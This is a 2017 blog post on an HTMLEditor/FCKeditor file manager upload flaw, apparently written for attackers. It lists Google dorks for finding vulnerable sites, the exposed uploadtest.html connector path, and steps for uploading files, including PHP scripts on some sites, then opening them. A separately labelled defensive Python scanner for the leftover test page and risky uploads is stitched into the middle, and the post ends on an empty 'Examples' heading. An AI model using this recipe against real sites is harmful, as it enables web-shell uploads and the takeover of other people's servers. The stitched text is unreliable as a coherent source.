Friday, December 8, 2017
Html editor File Upload vulnerability
Google Dork : inurl:/HTMLEditor/editor/
or "inurl:/HTMLEditor/editor//filemanager/"
or "inurl:/HTMLEditor/editor//filemanager//connectors/"
Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Go here :
http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
Change the connector to PHP (as in FCKeditor) and upload your file.
Supported files: .TXT and .JPG; on some sites you can upload .html and .php too.
To view your file, go to: http://website/PowerCMS%20folder/files/your file here
or http://website/path//PowerCMS%20folder/files/your file here
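A check a site owner can run against their own webroot for the issue described above, as an added example that is not part of the original post: it looks for the leftover uploadtest.html connector page and for uploaded files the server could execute or render. The function names, the `.phtml`/`.htm` extensions, the double-extension check and the sample tree are assumptions constructed for the example.

```python
import os
import tempfile

# Path from the post; matched case-insensitively since installs vary in casing.
CONNECTOR_SUFFIX = "editor/filemanager/connectors/uploadtest.html"
# .php/.html are named in the post; .phtml/.htm are added assumptions.
RISKY_EXTS = {".php", ".phtml", ".html", ".htm"}

def find_exposed_test_pages(webroot):
    """Return webroot-relative paths of leftover connector test pages."""
    hits = []
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            rel = os.path.relpath(os.path.join(dirpath, name), webroot)
            rel = rel.replace(os.sep, "/")
            if rel.lower().endswith(CONNECTOR_SUFFIX):
                hits.append(rel)
    return sorted(hits)

def find_risky_uploads(upload_dir):
    """Return uploaded files whose name carries a script or HTML extension."""
    hits = []
    for dirpath, _dirs, files in os.walk(upload_dir):
        for name in files:
            # Inspect every extension, so "img.php.jpg" is flagged as well.
            parts = {"." + p for p in name.lower().split(".")[1:]}
            if parts & RISKY_EXTS:
                rel = os.path.relpath(os.path.join(dirpath, name), upload_dir)
                hits.append(rel.replace(os.sep, "/"))
    return sorted(hits)

def build_sample_tree(root):
    """Constructed sample webroot for the demo; not taken from any real site."""
    samples = [
        "HTMLEditor/editor/filemanager/connectors/uploadtest.html",
        "app/htmleditor/editor/filemanager/connectors/uploadtest.html",
        "files/photo.jpg", "files/notes.txt",
        "files/page.html", "files/img.php.jpg",
    ]
    for rel in samples:
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()

def demo():
    """Run both checks on the constructed tree and return their findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return (find_exposed_test_pages(root),
                find_risky_uploads(os.path.join(root, "files")))

if __name__ == "__main__":
    print(demo())
```

Any path the first check reports should be deleted or blocked at the web server, and the upload directory should be configured so files in it are never executed.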
Examples :